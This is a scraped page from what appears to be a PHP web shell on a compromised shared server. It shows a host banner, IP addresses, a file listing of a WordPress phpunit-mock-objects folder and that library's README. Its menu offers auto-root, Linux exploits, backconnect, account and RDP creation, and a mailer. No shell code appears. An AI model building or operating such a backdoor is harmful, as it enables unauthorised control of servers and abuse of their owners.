Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
phpunit /
phpunit-mock-objects /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.gitattributes
15
B
-rw-r--r--
.php_cs
1.89
KB
-rw-r--r--
.travis.yml
459
B
-rw-r--r--
CONTRIBUTING.md
215
B
-rw-r--r--
LICENSE
1.52
KB
-rw-r--r--
README.md
1.04
KB
-rw-r--r--
build.xml
1.18
KB
-rw-r--r--
composer.json
1.2
KB
-rw-r--r--
phpunit.xml
794
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
[](https://packagist.org/packages/phpunit/phpunit-mock-objects) [](https://php.net/) [](https://travis-ci.org/sebastianbergmann/phpunit-mock-objects) # PHPUnit_MockObject **PHPUnit_MockObject** is the default mock object library for PHPUnit. ## Requirements * PHP 5.6 is required but using the latest version of PHP is highly recommended ## Installation You can add this library as a local, per-project dependency to your project using [Composer](https://getcomposer.org/): composer require phpunit/phpunit-mock-objects If you only need this library during development, for instance to run your project's test suite, then you should add it as a development-time dependency: composer require --dev phpunit/phpunit-mock-objects
Close